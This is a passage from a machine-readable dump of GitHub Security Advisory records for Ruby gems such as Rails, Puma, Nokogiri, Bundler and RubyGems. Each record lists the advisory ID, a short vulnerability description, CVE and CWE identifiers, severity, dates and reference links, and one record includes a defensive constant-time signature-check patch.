{'http://lists.fedoraproject.org/pipermail/package-announce/2013-November/120361.html', 'http://www.openwall.com/lists/oss-security/2013/03/03/8', 'https://github.com/openid/ruby-openid/pull/43', 'https://github.com/openid/ruby-openid', 'https://github.com/openid/ruby-openid/commit/a3693cef06049563f5b4e4824f4d3211288508ed', 'https://bugzilla.redhat.com/show_bug.cgi?id=918134', 'https://github.com/openid/ruby-openid/blob/master/CHANGELOG.md', 'http://lists.fedoraproject.org/pipermail/package-announce/2013-November/120204.html', 'https://github.com/advisories/GHSA-6c8p-qphv-668v', 'https://nvd.nist.gov/vuln/detail/CVE-2013-1812'}
null
RubyGems
GHSA-q2qw-rmrh-vv42
Moderate severity vulnerability that affects activejob
A Broken Access Control vulnerability in Active Job versions >= 4.2.0 allows an attacker to craft user input which can cause Active Job to deserialize it using GlobalId and give them access to information that they should not have.
{'CVE-2018-16476'}
2022-03-03T05:13:37.736265Z
2018-12-05T17:24:27Z
HIGH
null
{'CWE-284', 'CWE-502'}
{'https://groups.google.com/d/msg/rubyonrails-security/FL4dSdzr2zw/zjKVhF4qBAAJ', 'https://github.com/advisories/GHSA-q2qw-rmrh-vv42', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16476', 'https://access.redhat.com/errata/RHSA-2019:0600', 'https://weblog.rubyonrails.org/2018/11/27/Rails-4-2-5-0-5-1-5-2-have-been-released/'}
null
RubyGems
GHSA-78j3-7wpm-qhvp
Critical severity vulnerability that affects kelredd-pruview
kelredd-pruview gem 0.3.8 for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a filename argument to (1) document.rb, (2) video.rb, or (3) video_image.rb.
{'CVE-2013-1947'}
2022-03-03T05:13:38.386895Z
2017-10-24T18:33:37Z
CRITICAL
null
{'CWE-78'}
{'http://www.openwall.com/lists/oss-security/2013/04/10/3', 'http://www.openwall.com/lists/oss-security/2013/04/12/2', 'https://github.com/advisories/GHSA-78j3-7wpm-qhvp', 'https://nvd.nist.gov/vuln/detail/CVE-2013-1947'}
null
RubyGems
GHSA-8cr8-4vfw-mr7h
Round-trip instability in REXML
The REXML gem before 3.2.5 in Ruby before 2.6.7, 2.7.x before 2.7.3, and 3.x before 3.0.1 does not properly address XML round-trip issues. An incorrect document can be produced after parsing and serializing.
{'CVE-2021-28965'}
2022-03-03T05:12:51.494816Z
2021-04-30T17:30:37Z
HIGH
null
{'CWE-115', 'CWE-611'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-28965', 'https://github.com/ruby/rexml/commit/6a250d2cd1194c2be72becbdd9c3e770aa16e752', 'https://github.com/ruby/rexml/commit/9b311e59ae05749e082eb6bbefa1cb620d1a786e', 'https://github.com/ruby/rexml/commit/3c137eb119550874b2b3e27d12b733ca67033377', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTVFTLFVCSUE5CXHINJEUCKSHU4SWDMT/', 'https://github.com/ruby/rexml/commit/f9d88e4948b4a43294c25dc0edb16815bd9d8618', 'https://github.com/ruby/rexml/commit/2fe62e29094d95921d7e19abbd2e26b23d78dc5b', 'https://rubygems.org/gems/rexml', 'https://security.netapp.com/advisory/ntap-20210528-0003/', 'https://github.com/ruby/rexml/commit/a659c63e37414506dfb0d4655e031bb7a2e73fc8', 'https://www.ruby-lang.org/en/news/2021/04/05/xml-round-trip-vulnerability-in-rexml-cve-2021-28965/', 'https://hackerone.com/reports/1104077', 'https://github.com/ruby/rexml/commit/f7bab8937513b1403cea5aff874cbf32fd5e8551'}
null
RubyGems
GHSA-w7q9-xr2x-wh7x
Moderate severity vulnerability that affects delayed_job_web
An exploitable cross site scripting (XSS) vulnerability exists in the filter functionality of the delayed_job_web rails gem version 1.4. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary javascript on the victim's browser. An attacker can phish an authenticated user to trigger this vulnerability.
{'CVE-2017-12097'}
2021-09-21T18:04:52Z
2018-03-05T19:06:00Z
MODERATE
null
{'CWE-79'}
{'https://github.com/advisories/GHSA-w7q9-xr2x-wh7x', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12097', 'https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0449', 'http://www.securityfocus.com/bid/102484'}
null
RubyGems
GHSA-g982-9r8g-6qxw
Ciborg gem for Ruby allows local users to write files and gain privileges via Symlink
chef/travis-cookbooks/ci_environment/perlbrew/recipes/default.rb in the ciborg gem 3.0.0 for Ruby allows local users to write to arbitrary files and gain privileges via a symlink attack on /tmp/perlbrew-installer.
{'CVE-2014-5003'}
2022-04-26T18:16:48Z
2018-07-23T19:50:15Z
MODERATE
null
{'CWE-20'}
{'http://www.vapid.dhs.org/advisories/ciborg-3.0.0.html', 'https://github.com/advisories/GHSA-g982-9r8g-6qxw', 'http://www.openwall.com/lists/oss-security/2014/07/17/5', 'http://www.openwall.com/lists/oss-security/2014/07/07/24', 'https://nvd.nist.gov/vuln/detail/CVE-2014-5003'}
null
RubyGems
GHSA-7553-jr98-vx47
libxml as used in Nokogiri has an infinite loop in a certain end-of-file situation
xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation. The Nokogiri RubyGem has patched its vendored copy of libxml2 in order to prevent this issue from affecting nokogiri.
{'CVE-2020-7595'}
2022-04-22T17:30:56.762125Z
2020-02-24T19:12:36Z
HIGH
null
{'CWE-835'}
{'https://security.gentoo.org/glsa/202010-04', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00047.html', 'https://gitlab.gnome.org/GNOME/libxml2/commit/0e1a49c89076', 'https://github.com/sparklemotion/nokogiri/issues/1992', 'https://security.netapp.com/advisory/ntap-20200702-0005/', 'https://usn.ubuntu.com/4274-1/', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-103-08', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JDPF3AAVKUAKDYFMFKSIQSVVS3EEFPQH/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7595', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/545SPOI3ZPPNPX4TFRIVE4JVRTJRKULL/', 'https://github.com/sparklemotion/nokogiri', 'https://lists.debian.org/debian-lts-announce/2020/09/msg00009.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5R55ZR52RMBX24TQTWHCIWKJVRV6YAWI/', 'https://cert-portal.siemens.com/productcert/pdf/ssa-292794.pdf'}
null
RubyGems
GHSA-vmfh-c547-v45h
Remote code execution in ruby-jss
The Pixar ruby-jss gem before 1.6.0 allows remote attackers to execute arbitrary code because of the Plist gem's documented behavior of using Marshal.load during XML document processing.
{'CVE-2021-33575'}
2022-03-03T05:13:05.056197Z
2021-10-06T17:48:27Z
CRITICAL
null
null
{'https://github.com/patsplat/plist/tree/ce8f9ae42a114f603ea200c955e420782bffc4ad#label-Security+considerations', 'https://github.com/PixarAnimationStudios/ruby-jss/blob/e6d48dd8c77f9275c76787d60d3472615fcd9b77/CHANGES.md#160---2021-05-24', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33575', 'https://github.com/PixarAnimationStudios/ruby-jss'}
null
RubyGems
GHSA-5jjv-x4fq-qjwp
Possible timing attack in derivation_endpoint
### Impact When using the `derivation_endpoint` plugin, it's possible for the attacker to use a timing attack to guess the signature of the derivation URL. ### Patches The problem has been fixed by comparing sent and calculated signature in constant time, using `Rack::Utils.secure_compare`. Users using the `derivation_endpoint` plugin are urged to upgrade to Shrine 3.3.0 or greater. ### Workarounds Users of older Shrine versions can apply the following monkey-patch after loading the `derivation_endpoint` plugin: ```rb class Shrine class UrlSigner def verify_signature(string, signature) if signature.nil? fail InvalidSignature, "missing \"signature\" param" elsif !Rack::Utils.secure_compare(signature, generate_signature(string)) fail InvalidSignature, "provided signature does not match the calculated signature" end end end end ``` ### References You can read more about timing attacks [here](https://en.wikipedia.org/wiki/Timing_attack).
{'CVE-2020-15237'}
2022-03-03T05:12:51.614261Z
2020-10-05T15:48:34Z
MODERATE
null
{'CWE-208', 'CWE-203'}
{'https://github.com/shrinerb/shrine/security/advisories/GHSA-5jjv-x4fq-qjwp', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15237', 'https://github.com/shrinerb/shrine/commit/1b27090ce31543bf39f186c20ea47c8250fca2f0'}
null
RubyGems
GHSA-72rj-36qc-47g7
Information Disclosure
pgsync before 0.6.7 is affected by Information Disclosure of sensitive information. Syncing the schema with the --schema-first and --schema-only options is mishandled. For example, the sslmode connection parameter may be lost, which means that SSL would not be used.
{'CVE-2021-31671'}
2022-03-03T05:13:35.722980Z
2021-04-27T15:54:52Z
HIGH
null
{'CWE-319'}
{'https://rubygems.org/gems/pgsync', 'https://github.com/ankane/pgsync/issues/121', 'https://github.com/ankane/pgsync/blob/master/CHANGELOG.md#067-2021-04-26', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31671', 'https://github.com/ankane/pgsync/commit/05cd18f5fc09407e4b544f2c12f819cabc50c40e'}
null
RubyGems
GHSA-q4g7-jrxv-67r9
Silent Configuration Failure in Puppet Agent
A flaw was discovered in Puppet Agent where the agent may silently ignore Augeas settings or may be vulnerable to a Denial of Service condition prior to the first 'pluginsync'.
{'CVE-2021-27025'}
2022-03-03T05:13:17.338893Z
2021-12-02T17:54:25Z
MODERATE
null
null
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62SELE7EKVKZL4GABFMVYMIIUZ7FPEF7/', 'https://github.com/puppetlabs/puppet', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27025', 'https://puppet.com/security/cve/cve-2021-27025'}
null
RubyGems
GHSA-gx5g-xcxj-cx2w
Critical severity vulnerability that affects smart_proxy_dynflow
An authentication bypass flaw was found in the smart_proxy_dynflow component used by Foreman. A malicious attacker can use this flaw to remotely execute arbitrary commands on machines managed by vulnerable Foreman instances, in a highly privileged context.
{'CVE-2018-14643'}
2022-03-03T05:11:51.487985Z
2018-10-08T23:18:13Z
CRITICAL
null
{'CWE-287'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-14643', 'https://github.com/advisories/GHSA-gx5g-xcxj-cx2w'}
null
RubyGems
GHSA-f7f4-5w9j-23p2
festivaltts4r allows arbitrary command execution
The festivaltts4r gem for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a string to the (1) to_speech or (2) to_mp3 method in lib/festivaltts4r/festival4r.rb.
{'CVE-2016-10194'}
2022-04-25T17:02:01.176436Z
2017-10-24T18:33:35Z
CRITICAL
null
{'CWE-77'}
{'http://www.openwall.com/lists/oss-security/2017/02/02/5', 'https://github.com/spejman/festivaltts4r/issues/1', 'https://github.com/spejman/festivaltts4r', 'https://github.com/advisories/GHSA-f7f4-5w9j-23p2', 'http://www.openwall.com/lists/oss-security/2017/01/31/14', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10194'}
null
RubyGems
GHSA-7mvr-5x2g-wfc8
Moderate severity vulnerability that affects bootstrap
In Bootstrap before 4.1.2, XSS is possible in the data-container property of tooltip. This is similar to CVE-2018-14041.
{'CVE-2018-14042'}
2022-03-03T05:13:53.347150Z
2018-09-13T15:50:32Z
MODERATE
null
{'CWE-79'}
{'https://github.com/twbs/bootstrap/pull/26630', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'http://seclists.org/fulldisclosure/2019/May/13', 'http://seclists.org/fulldisclosure/2019/May/11', 'https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://github.com/advisories/GHSA-7mvr-5x2g-wfc8', 'http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html', 'https://seclists.org/bugtraq/2019/May/18', 'https://github.com/twbs/bootstrap/issues/26423', 'https://lists.apache.org/thread.html/r3dc0cac8d856bca02bd6997355d7ff83027dcfc82f8646a29b89b714@%3Cissues.hbase.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://github.com/twbs/bootstrap/issues/26628', 'https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@%3Cdev.superset.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2018-14042', 'http://seclists.org/fulldisclosure/2019/May/10', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E'}
null
RubyGems
GHSA-3h4r-pjv6-cph9
Escape sequence injection in RubyGems
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur.
{'CVE-2019-8323'}
2022-03-03T05:13:16.434017Z
2019-06-20T16:05:57Z
HIGH
null
{'CWE-74'}
{'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-8323', 'https://hackerone.com/reports/315081', 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html'}
null
RubyGems
GHSA-543v-gj2c-r3ch
Moderate severity vulnerability that affects activemodel
Active Model in Ruby on Rails 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 supports the use of instance-level writers for class accessors, which allows remote attackers to bypass intended validation steps via crafted parameters.
{'CVE-2016-0753'}
2022-03-03T05:14:02.331370Z
2017-10-24T18:33:35Z
MODERATE
null
{'CWE-20'}
{'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178041.html', 'https://nvd.nist.gov/vuln/detail/CVE-2016-0753', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178065.html', 'http://rhn.redhat.com/errata/RHSA-2016-0296.html', 'http://www.openwall.com/lists/oss-security/2016/01/25/14', 'http://lists.opensuse.org/opensuse-updates/2016-02/msg00043.html', 'http://www.securityfocus.com/bid/82247', 'https://groups.google.com/forum/message/raw?msg=ruby-security-ann/6jQVC1geukQ/3Iy0GU1ZEgAJ', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178066.html', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178047.html', 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/178043.html', 'http://www.debian.org/security/2016/dsa-3464', 'http://www.securitytracker.com/id/1034816', 'https://github.com/advisories/GHSA-543v-gj2c-r3ch', 'http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00053.html'}
null
RubyGems
GHSA-33vf-4xgg-9r58
HTTP Response Splitting (Early Hints) in Puma
### Impact If an application using Puma allows untrusted input in an early-hints header, an attacker can use a carriage return character to end the header and inject malicious content, such as additional headers or an entirely new response body. This vulnerability is known as [HTTP Response Splitting](https://owasp.org/www-community/attacks/HTTP_Response_Splitting) While not an attack in itself, response splitting is a vector for several other attacks, such as cross-site scripting (XSS). This is related to [CVE-2020-5247](https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v), which fixed this vulnerability but only for regular responses. ### Patches This has been fixed in 4.3.3 and 3.12.4. ### Workarounds Users can not allow untrusted/user input in the Early Hints response header. ### For more information If you have any questions or comments about this advisory: * Open an issue in [puma](https://github.com/puma/puma) * Email us a project maintainer. [Email addresses are listed in our Code of Conduct](https://github.com/puma/puma/blob/master/CODE_OF_CONDUCT.md#enforcement).
{'CVE-2020-5249'}
2022-03-03T05:13:14.257648Z
2020-03-03T23:33:16Z
MODERATE
null
{'CWE-113'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-5249', 'https://github.com/puma/puma/commit/c22712fc93284a45a93f9ad7023888f3a65524f3', 'https://owasp.org/www-community/attacks/HTTP_Response_Splitting', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NJ3LL5F5QADB6LM46GXZETREAKZMQNRD/', 'https://github.com/puma/puma/security/advisories/GHSA-33vf-4xgg-9r58', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BMJ3CGZ3DLBJ5WUUKMI5ZFXFJQMXJZIK/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DIHVO3CQMU7BZC7FCTSRJ33YDNS3GFPK/', 'https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v'}
null
RubyGems
GHSA-p463-639r-q9g9
High severity vulnerability that affects dragonfly
The Dragonfly gem 0.7 before 0.8.6 and 0.9.x before 0.9.13 for Ruby, when used with Ruby on Rails, allows remote attackers to execute arbitrary code via a crafted request.
{'CVE-2013-1756'}
2022-03-03T05:13:57.699140Z
2017-10-24T18:33:37Z
HIGH
null
{'CWE-94'}
{'https://github.com/advisories/GHSA-p463-639r-q9g9', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/82476', 'https://github.com/markevans/dragonfly', 'https://github.com/markevans/dragonfly/commit/a8775aacf9e5c81cf11bec34b7afa7f27ddfe277', 'https://groups.google.com/forum/?fromgroups=#!topic/dragonfly-users/3c3WIU3VQTo', 'http://www.securityfocus.com/bid/58225', 'https://nvd.nist.gov/vuln/detail/CVE-2013-1756', 'http://secunia.com/advisories/52380'}
null
RubyGems
GHSA-rqp5-pg7w-832p
Code Injection in datagrid
The datagrid gem 1.0.6 for Ruby, as distributed on RubyGems.org, included a code-execution backdoor inserted by a third party.
{'CVE-2019-14281'}
2021-08-17T20:22:53Z
2019-07-31T04:21:27Z
CRITICAL
null
{'CWE-94'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-14281', 'https://github.com/rubygems/rubygems.org/issues/2072', 'https://rubygems.org/gems/datagrid/versions'}
null
RubyGems
GHSA-cr3x-7m39-c6jq
Potential remote code execution of user-provided local names in ActionView
The is a code injection vulnerability in versions of Rails prior to 5.0.1 that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.
{'CVE-2020-8163'}
2022-03-03T05:13:17.034373Z
2020-07-07T16:34:27Z
MODERATE
null
{'CWE-94'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-8163', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-8163.yml', 'https://groups.google.com/forum/#!topic/rubyonrails-security/hWuKcHyoKh0', 'https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html', 'https://hackerone.com/reports/304805', 'https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0', 'http://packetstormsecurity.com/files/158604/Ruby-On-Rails-5.0.1-Remote-Code-Execution.html'}
null
RubyGems
GHSA-grh7-935j-hg6w
Cross-site Scripting in Sidekiq
Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
{'CVE-2021-30151'}
2022-03-11T21:32:03.736743Z
2021-10-06T17:47:17Z
MODERATE
null
{'CWE-79'}
{'https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-30151', 'https://github.com/mperham/sidekiq', 'https://github.com/mperham/sidekiq/issues/4852', 'https://github.com/mperham/sidekiq/commit/64f70339d1dcf50a55c00d36bfdb61d97ec63ed8'}
null
RubyGems
GHSA-2p82-v77v-mppr
Airbrake
The Airbrake Ruby notifier 4.2.3 for Airbrake mishandles the blacklist_keys configuration option and consequently may disclose passwords to unauthorized actors. This is fixed in 4.2.4 (also, 4.2.2 and earlier are unaffected).
{'CVE-2019-16060'}
2021-08-17T22:26:27Z
2019-09-11T23:05:57Z
CRITICAL
null
{'CWE-200'}
{'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/airbrake-ruby/CVE-2019-16060.yml', 'https://github.com/airbrake/airbrake-ruby/issues/468', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16060'}
null
RubyGems
GHSA-fp4w-jxhp-m23p
Dependency Confusion in Bundler
Bundler 1.16.0 through 2.2.9 and 2.2.11 through 2.2.17 sometimes chooses a dependency source based on the highest gem version number, which means that a rogue gem found at a public source may be chosen, even if the intended choice was a private gem that is a dependency of another private gem that is explicitly depended on by the application.
{'CVE-2020-36327'}
2022-04-07T16:01:53.914898Z
2021-05-24T18:12:33Z
HIGH
null
null
{'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24105', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bundler/CVE-2020-36327.yml', 'https://github.com/rubygems/rubygems', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36327', 'https://github.com/rubygems/rubygems/blob/master/bundler/CHANGELOG.md#2218-may-25-2021', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MWXHK5UUHVSHF7HTHMX6JY3WXDVNIHSL/', 'https://github.com/rubygems/rubygems/issues/3982', 'https://github.com/rubygems/rubygems/commit/078bf682ac40017b309b5fc69f283ff640e7c129', 'https://bundler.io/blog/2021/02/15/a-more-secure-bundler-we-fixed-our-source-priorities.html', 'https://mensfeld.pl/2021/02/rubygems-dependency-confusion-attack-side-of-things/', 'https://github.com/rubygems/rubygems/pull/4609', 'https://www.zofrex.com/blog/2021/04/29/bundler-still-vulnerable-dependency-confusion-cve-2020-36327/'}
null
RubyGems
GHSA-574q-fxfj-wv6h
High severity vulnerability that affects puppet
Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby 1.9.3 or later, allows remote attackers to execute arbitrary code via vectors related to "serialized attributes."
{'CVE-2013-1655'}
2022-03-03T05:11:06.504119Z
2017-10-24T18:33:37Z
HIGH
null
{'CWE-20'}
{'http://lists.opensuse.org/opensuse-updates/2013-04/msg00056.html', 'https://puppetlabs.com/security/cve/cve-2013-1655/', 'http://secunia.com/advisories/52596', 'http://lists.opensuse.org/opensuse-security-announce/2013-04/msg00004.html', 'https://nvd.nist.gov/vuln/detail/CVE-2013-1655', 'http://www.debian.org/security/2013/dsa-2643', 'http://www.securityfocus.com/bid/58442', 'http://ubuntu.com/usn/usn-1759-1', 'https://github.com/advisories/GHSA-574q-fxfj-wv6h'}
null
RubyGems
GHSA-gx8x-g87m-h5q6
Denial of Service (DoS) in Nokogiri on JRuby
## Summary Nokogiri `v1.13.4` updates the vendored `org.cyberneko.html` library to `1.9.22.noko2` which addresses [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv). That CVE is rated 7.5 (High Severity). See [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) for more information. Please note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`. ## Mitigation Upgrade to Nokogiri `>= 1.13.4`. ## Impact ### [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) in nekohtml - **Severity**: High 7.5 - **Type**: [CWE-400](https://cwe.mitre.org/data/definitions/400.html) Uncontrolled Resource Consumption - **Description**: The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup. - **See also**: [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv)
null
2022-04-11T21:46:13.507995Z
2022-04-11T21:38:11Z
HIGH
null
{'CWE-400'}
{'https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv', 'https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4', 'https://github.com/sparklemotion/nekohtml/commit/a800fce3b079def130ed42a408ff1d09f89e773d', 'https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-gx8x-g87m-h5q6', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24839', 'https://github.com/sparklemotion/nokogiri', 'https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ?utm_medium=email&utm_source=footer'}
null
RubyGems
GHSA-rmj8-8hhh-gv5h
Information Exposure when using Puma with Rails
### Impact Prior to `puma` version `5.6.2`, `puma` may not always call `close` on the response body. Rails, prior to version `7.0.2.2`, depended on the response body being closed in order for its `CurrentAttributes` implementation to work correctly. From Rails: > Under certain circumstances response bodies will not be closed, for example a bug in a webserver[1] or a bug in a Rack middleware. In the event a response is not notified of a close, ActionDispatch::Executor will not know to reset thread local state for the next request. This can lead to data being leaked to subsequent requests, especially when interacting with ActiveSupport::CurrentAttributes. The combination of these two behaviors (Puma not closing the body + Rails' Executor implementation) causes information leakage. ### Patches This problem is fixed in Puma versions 5.6.2 and 4.3.11. This problem is fixed in Rails versions 7.02.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2. See: https://github.com/advisories/GHSA-wh98-p28r-vrc9 for details about the rails vulnerability Upgrading to a patched Rails _or_ Puma version fixes the vulnerability. ### Workarounds Upgrade to Rails versions 7.02.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2. The [Rails CVE](https://groups.google.com/g/ruby-security-ann/c/FkTM-_7zSNA/m/K2RiMJBlBAAJ?utm_medium=email&utm_source=footer&pli=1) includes a middleware that can be used instead. ### References * Rails CVE: [CVE-2022-23633](https://groups.google.com/g/ruby-security-ann/c/FkTM-_7zSNA/m/K2RiMJBlBAAJ?utm_medium=email&utm_source=footer&pli=1) ### For more information If you have any questions or comments about this advisory: * Open an issue in [puma](https://github.com/puma/puma) * See our [security policy](https://github.com/puma/puma/security/policy)
{'CVE-2022-23634'}
2022-03-03T05:14:18.447089Z
2022-02-11T21:33:23Z
HIGH
null
{'CWE-200'}
{'https://github.com/puma/puma/security/advisories/GHSA-rmj8-8hhh-gv5h', 'https://github.com/advisories/GHSA-wh98-p28r-vrc9', 'https://groups.google.com/g/ruby-security-ann/c/FkTM-_7zSNA/m/K2RiMJBlBAAJ?utm_medium=email&utm_source=footer&pli=1', 'https://github.com/puma/puma', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23634', 'https://github.com/advisories/GHSA-rmj8-8hhh-gv5h', 'https://github.com/puma/puma/commit/b70f451fe8abc0cff192c065d549778452e155bb'}
null
RubyGems
GHSA-8jhx-9gf4-hhf5
Improper Access Control in consul
The makandra consul gem through 1.0.2 for Ruby has Incorrect Access Control.
{'CVE-2019-16377'}
2022-03-03T05:12:47.457822Z
2019-09-27T20:01:00Z
CRITICAL
null
{'CWE-284'}
{'https://rubygems.org/gems/consul', 'https://github.com/makandra/consul/issues/49', 'https://github.com/rubysec/ruby-advisory-db/blob/c26fbc13435b8be448ad59131428538049d165e4/gems/consul/CVE-2019-16377.yml', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16377'}
null
RubyGems
GHSA-c9c5-9fpr-m882
Moderate severity vulnerability that affects sentry-raven
The numtok function in lib/raven/okjson.rb in the raven-ruby gem before 0.12.2 for Ruby allows remote attackers to cause a denial of service via a large exponent value in a scientific number.
{'CVE-2014-9490'}
2022-03-03T05:13:09.656620Z
2017-10-24T18:33:36Z
MODERATE
null
null
{'https://nvd.nist.gov/vuln/detail/CVE-2014-9490', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/99687', 'https://github.com/getsentry/raven-ruby/commit/477ee93a3f735be33bc1e726820654cdf6e22d8f', 'http://seclists.org/oss-sec/2015/q1/26', 'https://github.com/getsentry/raven-ruby', 'https://github.com/advisories/GHSA-c9c5-9fpr-m882', 'https://groups.google.com/forum/#!topic/getsentry/Cz5bih0ZY1U'}
null
RubyGems
GHSA-93j5-g845-9wqp
Unsafe HTTP Redirect in Puppet Agent and Puppet Server
A flaw was discovered in Puppet Agent and Puppet Server that may result in a leak of HTTP credentials when following HTTP redirects to a different host. This is similar to CVE-2018-1000007
{'CVE-2021-27023'}
2022-03-03T05:12:57.431162Z
2021-12-02T17:52:45Z
MODERATE
null
null
{'https://puppet.com/security/cve/CVE-2021-27023', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62SELE7EKVKZL4GABFMVYMIIUZ7FPEF7/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27023', 'https://github.com/puppetlabs/puppet'}
null
RubyGems
GHSA-5x32-c9mf-49cc
Directory traversal in RubyGems
A Directory Traversal issue was discovered in RubyGems 2.7.6 and later through 3.0.2. Before making new directories or touching files (which now include path-checking code for symlinks), it would delete the target destination. If that destination was hidden behind a symlink, a malicious gem could delete arbitrary files on the user's machine, presuming the attacker could guess at paths. Given how frequently gem is run as sudo, and how predictable paths are on modern systems (/tmp, /usr, etc.), this could likely lead to data loss or an unusable system.
{'CVE-2019-8320'}
2022-03-03T05:13:48.689978Z
2019-06-20T16:06:15Z
HIGH
null
{'CWE-22'}
{'https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html', 'https://access.redhat.com/errata/RHSA-2019:1429', 'https://nvd.nist.gov/vuln/detail/CVE-2019-8320', 'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html', 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html', 'https://hackerone.com/reports/317321'}
null
RubyGems
GHSA-cfjv-5498-mph5
XSS in Action View
